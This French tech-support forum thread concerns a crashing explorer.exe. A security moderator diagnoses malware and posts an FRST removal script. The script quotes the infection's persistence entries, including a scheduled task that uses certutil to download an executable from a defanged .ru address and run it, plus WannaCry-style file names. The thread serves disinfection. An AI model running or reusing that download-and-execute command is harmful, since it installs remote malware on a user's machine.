Explorer.exe se plante : rapport FRST
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Rymel
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Modifié le 8 janv. 2020 à 11:35
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 8 janv. 2020 à 18:01
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 8 janv. 2020 à 18:01
A voir également:
- Explorer.exe se plante : rapport FRST
- Explorer.exe - Télécharger - Divers Utilitaires
- "Pourquoi explorer.exe plante?" ✓ - Forum Windows
- [Explorer.Exe] crash sans arrêt. non stop. - Forum Windows
- Pourquoi wuauclt.exe plante? ✓ - Forum Windows
- Explorer.exe "Classe non enregistrée" ✓ - Forum Windows 10
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jfmimi
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Modifié le 8 janv. 2020 à 11:45
Modifié le 8 janv. 2020 à 11:45
Bonjours
avez vous essayer de faire un " sfc /scannow " en ligne de commande ?
"Pourcentage de mémoire utilisée: 88% " =pas bon memoire saturer.
avez vous essayer de faire un " sfc /scannow " en ligne de commande ?
"Pourcentage de mémoire utilisée: 88% " =pas bon memoire saturer.
je viens d'effectuer le sfc /scannow et voici les résultats:
La protection de windows a trouvé des fichiers endommagés, mais n'a pas réussi à tous les réparer. Des détails sont inclus dans le journal CBS.log windir\logs\CBS.log. Par exemple C/\windows\Logs\CBS\CBS.log
Les modifications consécutives à la réparation des fichiers système prendront effet après le prochain redémarrage.
La protection de windows a trouvé des fichiers endommagés, mais n'a pas réussi à tous les réparer. Des détails sont inclus dans le journal CBS.log windir\logs\CBS.log. Par exemple C/\windows\Logs\CBS\CBS.log
Les modifications consécutives à la réparation des fichiers système prendront effet après le prochain redémarrage.
jfmimi
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8 janv. 2020 à 15:39
8 janv. 2020 à 15:39
explorer ce plante toujours ??
Utilisateur anonyme
Modifié le 8 janv. 2020 à 14:12
Modifié le 8 janv. 2020 à 14:12
Bonjour,
Tenter une restauration système antérieure à 2 jours (avant le problème).
Ou essayer de démarrer en mode sans échec et tester...
Tenter une restauration système antérieure à 2 jours (avant le problème).
Ou essayer de démarrer en mode sans échec et tester...
Malekal_morte-
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Modifié le 8 janv. 2020 à 18:02
Modifié le 8 janv. 2020 à 18:02
Salut,
Alors...
Tu as l'air d'avoir réinstallé Windows 7 et il n'est pas à jour (Pas de service Pack 1).
En plus, c'est une version anglaise.
Ca sent un peu la version tombée de camion.
Et il y a des malwares.
On peut désinfecter, mais sinon faudrait remettre un Windows correct.
C'est voulu cette version ?
Tu as essayé de faire quoi ?
~~
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.
Enregistre le contenu par le menu fichier puis enregistrer.
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, si tu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.
4)
Refais un scan FRST et donne les nouveaux rapports via pjjoint
Alors...
Tu as l'air d'avoir réinstallé Windows 7 et il n'est pas à jour (Pas de service Pack 1).
En plus, c'est une version anglaise.
Ca sent un peu la version tombée de camion.
Et il y a des malwares.
On peut désinfecter, mais sinon faudrait remettre un Windows correct.
C'est voulu cette version ?
Tu as essayé de faire quoi ?
~~
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.
Start:
CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-1608363478-4015215132-2699116129-1000\...\Run: [CloudNet] => C:\Users\ALL-TECH\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2020-01-08] (EpicNet Inc.) [Fichier non signé] <==== ATTENTION
C:\Program Files (x86)\baidu
Task: {DCD06203-B7D1-4862-8B8E-04B7A74F1A46} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4027392 2020-01-07] () [Fichier non signé] <==== ATTENTION
Task: {DFCA423A-8734-4E86-96FD-A8E93AED4329} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://imaginemix.ru/app/app.exe C:\Users\ALL-TECH\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\ALL-TECH\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
R2 SparkSvc; C:\Program Files (x86)\baidu\Spark\sparkservice.exe [96784 2018-02-23] (Baidu Online Network Technology (Beijing) Co.,Ltd. -> Baidu Inc.)
S3 SparkUpdater; C:\Program Files (x86)\Baidu\SparkUpdate\Sparkupdate.exe [1628352 2014-05-07] (Baidu Online Network Technology (Beijing)Co., Ltd -> Baidu.com, Inc.) [Fichier non signé]
R2 TheCalendarService; C:\Program Files (x86)\CalendarTool\2.0.0.1000176\CalendarServ.exe [151696 2017-08-20] (ShenZhen Qianhailewang Technology Co,.Ltd -> )
R2 WinDefender; C:\Windows\windefender.exe [2079744 2020-01-07] () [Fichier non signé]
R2 postgresql-x64-9.5; "C:\Program Files\PostgreSQL\9.5\bin\pg_ctl.exe" runservice -N "postgresql-x64-9.5" -D "C:\Program Files\PostgreSQL\9.5\data" -w
R2 postgresql-x64-9.6; "C:\Program Files\PostgreSQL\9.6\bin\pg_ctl.exe" runservice -N "postgresql-x64-9.6" -D "C:\Program Files\PostgreSQL\9.6\data" -w
2020-01-07 10:28 - 2020-01-08 10:47 - 000003506 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2020-01-07 10:28 - 2020-01-08 10:47 - 000003196 _____ C:\Windows\system32\Tasks\csrss
2020-01-07 10:28 - 2020-01-07 10:28 - 002079744 ____H C:\Windows\windefender.exe
2020-01-07 10:28 - 2020-01-07 10:28 - 000000000 ___HD C:\Windows\rss
2020-01-06 11:11 - 2020-01-08 10:48 - 003514368 ____S C:\Windows\tasksche.exe
2020-01-06 11:11 - 2020-01-07 14:47 - 003514368 ____S C:\Windows\qeriuwjhrf
2020-01-06 11:11 - 2020-01-06 11:11 - 003723264 ____S C:\Windows\mssecsvc.exe
EmptyTemp:
RemoveProxy:
Hosts:
Reboot:
End:
Enregistre le contenu par le menu fichier puis enregistrer.
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, si tu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.
4)
Refais un scan FRST et donne les nouveaux rapports via pjjoint
8 janv. 2020 à 11:47
et pour la mémoire, c'est un nouveau pc, il ne contient que quelques documents et photos, ni films ni vidéos
8 janv. 2020 à 13:20
retour SAV
et pas normale 88% de ram utiliser !!!